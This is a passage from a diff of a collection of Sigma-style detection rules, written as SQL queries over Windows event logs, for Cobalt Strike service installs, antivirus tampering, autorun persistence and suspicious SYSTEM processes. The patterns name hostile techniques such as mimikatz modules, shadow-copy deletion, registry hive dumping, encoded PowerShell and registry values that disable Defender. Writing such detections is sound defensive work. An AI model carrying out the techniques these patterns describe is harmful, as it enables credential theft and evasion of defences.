OR CommandLine LIKE '%uAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBCA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Image File Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\')) AND NOT ((NewValue LIKE '(Empty)' ESCAPE '\\' OR NewValue LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_webclient_casing.yml" + "filename": "registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" }, { - "title": "Suspicious SYSTEM User Process Creation", - "id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", + "title": "CobaltStrike Service Installations in Registry", + "id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", "status": "test", - "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", - "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", + "author": "Wojciech Lesicki", + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" + ], "falsepositives": [ - "Administrative activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((IntegrityLevel = 'System' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '% /urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -e% JAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% -e% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% -e% IAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '%vssadmin delete shadows%' ESCAPE '\\' OR CommandLine LIKE '%reg SAVE HKLM%' ESCAPE '\\' OR CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%event::clear%' ESCAPE '\\' OR CommandLine LIKE '%event::drop%' ESCAPE '\\' OR CommandLine LIKE '%id::modify%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%misc::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%sid::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%vault::cred%' ESCAPE '\\' OR CommandLine LIKE '%vault::list%' ESCAPE '\\' OR CommandLine LIKE '% p::d %' ESCAPE '\\' OR CommandLine LIKE '%;iex(%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\' OR CommandLine LIKE '%net user %' ESCAPE '\\'))) AND NOT ((CommandLine = 'ping 127.0.0.1 -n 5') OR (NewProcessName LIKE '%\\\\PING.EXE' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\bin\\\\javaws.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\bin\\\\jp2launcher.exe' ESCAPE '\\' AND CommandLine LIKE '% -ma %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%HKLM\\\\System\\\\CurrentControlSet\\\\Services%' ESCAPE '\\') AND ((NewValue LIKE '%ADMIN$%' ESCAPE '\\' AND NewValue LIKE '%.exe%' ESCAPE '\\') OR (NewValue LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND NewValue LIKE '%start%' ESCAPE '\\' AND NewValue LIKE '%powershell%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_system_user_anomaly.yml" + "filename": "registry_set_cobaltstrike_service_installs.yml" }, { - "title": "LockerGoga Ransomware Activity", - "id": "74db3488-fd28-480a-95aa-b7af626de068", - "status": "stable", - "description": "Detects LockerGoga ransomware activity via specific command line.", - "author": "Vasiliy Burov, oscd.community", + "title": "Tamper With Sophos AV Registry Keys", + "id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", + "status": "experimental", + "description": "Detects tamper attempts to sophos av functionality via registry key modification", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1486" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-i SM-tgytutrc -s%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SAVEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SEDEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos\\\\SAVService\\\\TamperProtection\\\\Enabled%' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_malware_lockergoga_ransomware.yml" + "filename": "registry_set_sophos_av_tamper.yml" }, { - "title": "Xwizard DLL Sideloading", - "id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", + "title": "Disable Administrative Share Creation at Startup", + "id": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", "status": "test", - "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", - "author": "Christian Burkard (Nextron Systems)", + "description": "Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1070.005" ], "falsepositives": [ - "Windows installed on non-C drive" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanServer\\\\Parameters\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%AutoShareWks' ESCAPE '\\' OR TargetObject LIKE '%AutoShareServer' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml" + "filename": "registry_set_disable_administrative_share.yml" }, { - "title": "Suspicious Add Scheduled Task Parent", - "id": "9494479d-d994-40bf-a8b1-eea890237021", - "status": "experimental", - "description": "Detects suspicious scheduled task creations from a parent stored in a temporary folder", - "author": "Florian Roth (Nextron Systems)", + "title": "Internet Explorer Autorun Keys Modification", + "id": "a80f662f-022f-4429-9b8c-b1a41aaa6688", + "status": "test", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Software installers that run from temporary folders and also install scheduled tasks" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%unattended.ini%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Toolbar%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer Bars%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR ((TargetObject LIKE '%\\\\Extensions\\\\{2670000A-7350-4f3c-8081-5663EE0C6C49}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{A95fe080-8f5d-11d2-a20b-00aa003c157a}%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Toolbar\\\\ShellBrowser\\\\ITBar7Layout' ESCAPE '\\' OR TargetObject LIKE '%\\\\Toolbar\\\\ShowDiscussionButton' ESCAPE '\\' OR TargetObject LIKE '%\\\\Toolbar\\\\Locked' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_schtasks_parent.yml" + "filename": "registry_set_asep_reg_keys_modification_internet_explorer.yml" }, { - "title": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", - "id": "e9b61244-893f-427c-b287-3e708f321c6b", + "title": "Potential Persistence Via AutodialDLL", + "id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", "status": "experimental", - "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". This technique provides an elevated command prompt to the user from the login screen without the need to log in.", - "author": "frack113", + "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1546.008" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%\\\\osk.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\WinSock2\\\\Parameters\\\\AutodialDLL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml" + "filename": "registry_set_persistence_autodial_dll.yml" }, { - "title": "CreateDump Process Dump", - "id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", + "title": "Disable Windows Defender Functionalities Via Registry Keys", + "id": "0eb46774-f1ab-4a74-8238-1155855f2263", "status": "experimental", - "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", + "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.t1562.001" ], "falsepositives": [ - "Command lines that use the same flags" + "Administrator actions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\createdump.exe' ESCAPE '\\' OR OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\') AND (CommandLine LIKE '% -u %' ESCAPE '\\' OR CommandLine LIKE '% --full %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% --name %' ESCAPE '\\' OR CommandLine LIKE '%.dmp %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\') AND (((TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableOnAccessProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Reporting\\\\DisableEnhancedNotifications' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\DisableBlockAtFirstSeen' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiSpyware' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiVirus' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\SpyNet\\\\SpynetReporting' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\SubmitSamplesConsent' ESCAPE '\\' OR TargetObject LIKE '%\\\\MpEngine\\\\MpEnablePus' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" ], - "filename": "proc_creation_win_lolbin_createdump.yml" + "filename": "registry_set_windows_defender_tamper.yml" }, { - "title": "Kavremover Dropped Binary LOLBIN Usage", - "id": "d047726b-c71c-4048-a99b-2e2f50dc107d", + "title": "Potential Attachment Manager Settings Associations Tamper", + "id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", "status": "experimental", - "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", + "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ], "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '% run run-cmd %' ESCAPE '\\' AND NOT ((ParentProcessName LIKE '%\\\\kavremover.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cleanapi.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Associations\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\DefaultFileTypeRisk' ESCAPE '\\' AND NewValue = 'DWORD (0x00006152)') OR (TargetObject LIKE '%\\\\LowRiskFileTypes' ESCAPE '\\' AND (NewValue LIKE '%.zip;%' ESCAPE '\\' OR NewValue LIKE '%.rar;%' ESCAPE '\\' OR NewValue LIKE '%.exe;%' ESCAPE '\\' OR NewValue LIKE '%.bat;%' ESCAPE '\\' OR NewValue LIKE '%.com;%' ESCAPE '\\' OR NewValue LIKE '%.cmd;%' ESCAPE '\\' OR NewValue LIKE '%.reg;%' ESCAPE '\\' OR NewValue LIKE '%.msi;%' ESCAPE '\\' OR NewValue LIKE '%.htm;%' ESCAPE '\\' OR NewValue LIKE '%.html;%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_kavremover.yml" + "filename": "registry_set_policies_associations_tamper.yml" }, { - "title": "Execute Code with Pester.bat", - "id": "59e938ff-0d6d-4dc3-b13f-36cc28734d4e", - "status": "test", - "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", - "author": "Julia Fomina, oscd.community", + "title": "Winlogon AllowMultipleTSSessions Enable", + "id": "f7997770-92c3-4ec9-b112-774c4ef96f96", + "status": "experimental", + "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP session without disconnecting the other users\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", + "attack.persistence", "attack.defense_evasion", - "attack.t1216" + "attack.t1112" ], "falsepositives": [ - "Legitimate use of Pester for writing tests for Powershell scripts and modules" + "Legitimate use of the multi session functionality" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Pester%' ESCAPE '\\' AND CommandLine LIKE '%Get-Help%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%pester%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\' AND (CommandLine LIKE '%help%' ESCAPE '\\' OR CommandLine LIKE '%_%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AllowMultipleTSSessions' ESCAPE '\\' AND NewValue LIKE '%DWORD (0x00000001)' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pester_1.yml" + "filename": "registry_set_winlogon_allow_multiple_tssessions.yml" }, { - "title": "PUA - Wsudo Suspicious Execution", - "id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", + "title": "Custom File Open Handler Executes PowerShell", + "id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", "status": "experimental", - "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the abuse of custom file open handler, executing powershell", + "author": "CD_R0M_", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1059" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wsudo.exe' ESCAPE '\\' OR OriginalFileName = 'wsudo.exe' OR Description = 'Windows sudo utility' OR ParentProcessName LIKE '%\\\\wsudo-bridge.exe' ESCAPE '\\' OR (CommandLine LIKE '%-u System%' ESCAPE '\\' OR CommandLine LIKE '%-uSystem%' ESCAPE '\\' OR CommandLine LIKE '%-u TrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '%-uTrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '% --ti %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%shell\\\\open\\\\command\\\\%' ESCAPE '\\' AND NewValue LIKE '%powershell%' ESCAPE '\\' AND NewValue LIKE '%-command%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "proc_creation_win_pua_wsudo_susp_execution.yml" + "filename": "registry_set_custom_file_open_handler_powershell_execution.yml" }, { - "title": "HackTool - SharpView Execution", - "id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", + "title": "Wow6432Node Classes Autorun Keys Modification", + "id": "18f2065c-d36c-464a-a748-bcf909acb2e3", + "status": "test", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "falsepositives": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" + ], + "filename": "registry_set_asep_reg_keys_modification_wow6432node_classes.yml" + }, + { + "title": "Registry Persitence via Service in Safe Mode", + "id": "1547e27c-3974-43e2-a7d7-7f484fb928ec", "status": "experimental", - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1049", - "attack.t1069.002", - "attack.t1482", - "attack.t1135", - "attack.t1033" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'SharpView.exe' OR NewProcessName LIKE '%\\\\SharpView.exe' ESCAPE '\\' OR (CommandLine LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Convert-ADName%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-SID%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR CommandLine LIKE '%Convert-SidToName%' ESCAPE '\\' OR CommandLine LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainProcess%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainShare%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignUser%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-Interesting%' ESCAPE '\\' OR CommandLine LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR CommandLine LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-DFSshare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainController%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainForeign%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGUIDMap%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSID%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSite%' ESCAPE '\\' OR CommandLine 